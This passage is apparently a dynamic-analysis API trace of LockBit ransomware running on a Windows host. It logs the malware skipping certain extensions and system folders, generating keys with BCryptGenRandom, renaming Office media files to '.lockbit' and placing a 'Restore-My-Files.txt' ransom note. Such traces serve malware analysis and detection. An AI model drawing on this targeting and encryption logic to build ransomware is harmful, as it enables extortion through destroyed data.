(lpString1=".sql", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.549] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.550] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF.lockbit") returned 70 [0199.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0335112.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.551] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.551] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.551] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8036) returned 1 [0199.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.552] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.556] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.556] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.556] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.558] free (_Block=0x1fa2ed8) [0199.558] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.558] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.558] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c046200, ftCreationTime.dwHighDateTime=0x1bfaf5c, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2c046200, ftLastWriteTime.dwHighDateTime=0x1bfaf5c, nFileSizeHigh=0x0, nFileSizeLow=0xce9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0336075.WMF", cAlternateFileName="")) returned 1 [0199.558] lstrcmpiW (lpString1=".", lpString2="J0336075.WMF") returned -1 [0199.558] lstrcmpiW (lpString1="..", lpString2="J0336075.WMF") returned -1 [0199.558] PathFindExtensionW (pszPath="J0336075.WMF") returned=".WMF" [0199.558] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.558] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.559] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.559] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0336075.WMF") returned 1 [0199.560] lstrcmpiW (lpString1="ntldr", lpString2="J0336075.WMF") returned 1 [0199.560] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0336075.WMF") returned 1 [0199.560] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0336075.WMF") returned -1 [0199.560] lstrcmpiW (lpString1="autorun.inf", lpString2="J0336075.WMF") returned -1 [0199.560] lstrcmpiW (lpString1="thumbs.db", lpString2="J0336075.WMF") returned 1 [0199.560] lstrcmpiW (lpString1="iconcache.db", lpString2="J0336075.WMF") returned -1 [0199.560] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.560] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF") returned=".WMF" [0199.560] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.560] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.560] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.561] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.562] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.562] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF.lockbit") returned 70 [0199.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0336075.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.563] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.563] malloc (_Size=0x40068) returned 0x3d70450 [0199.563] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=52890) returned 1 [0199.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.564] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.564] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0199.568] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.568] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.568] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.570] free (_Block=0x1fa2ed8) [0199.570] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.570] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.570] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.570] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2824fe0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb2824fe0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb284b140, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0199.570] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0199.570] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0199.570] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0199.570] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0199.570] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0199.570] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0199.570] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0199.570] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0199.571] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0199.571] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".lnk", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1=".lockbit", lpString2=".txt") returned -1 [0199.572] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0199.572] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2824fe0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb2824fe0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb284b140, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 0 [0199.572] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0199.572] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0199.572] lstrcmpiW (lpString1=".", lpString2="OFFICE14") returned -1 [0199.572] lstrcmpiW (lpString1="..", lpString2="OFFICE14") returned -1 [0199.572] lstrcmpiW (lpString1="OFFICE14", lpString2="$windows.~bt") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="intel") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="msocache") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="$recycle.bin") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="$windows.~ws") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="tor browser") returned -1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="boot") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="system volume information") returned -1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="perflogs") returned -1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="google") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="application data") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="windows") returned -1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="windows.old") returned -1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="appdata") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="Windows nt") returned -1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="Msbuild") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="Microsoft") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="All users") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="mozilla") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="Microsoft.NET") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="microsoft shared") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="Internet Explorer") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="common files") returned 1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="opera") returned -1 [0199.573] lstrcmpiW (lpString1="OFFICE14", lpString2="Windows Journal") returned -1 [0199.573] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14") returned 49 [0199.574] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*") returned 51 [0199.574] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0199.578] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0199.578] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.578] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0199.578] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0199.578] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0199.579] lstrcmpiW (lpString1=".", lpString2="1033") returned -1 [0199.579] lstrcmpiW (lpString1="..", lpString2="1033") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="$windows.~bt") returned 1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="intel") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="$recycle.bin") returned 1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="$windows.~ws") returned 1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="tor browser") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="google") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="application data") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="windows.old") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="appdata") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="Windows nt") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="Msbuild") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="Microsoft") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="All users") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="mozilla") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="Microsoft.NET") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="microsoft shared") returned -1 [0199.579] lstrcmpiW (lpString1="1033", lpString2="Internet Explorer") returned -1 [0199.580] lstrcmpiW (lpString1="1033", lpString2="common files") returned -1 [0199.580] lstrcmpiW (lpString1="1033", lpString2="opera") returned -1 [0199.580] lstrcmpiW (lpString1="1033", lpString2="Windows Journal") returned -1 [0199.580] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned 54 [0199.580] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*") returned 56 [0199.580] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0199.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0199.580] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.580] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0199.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0199.580] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x130a0400, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x130a0400, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c438, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MML", cAlternateFileName="")) returned 1 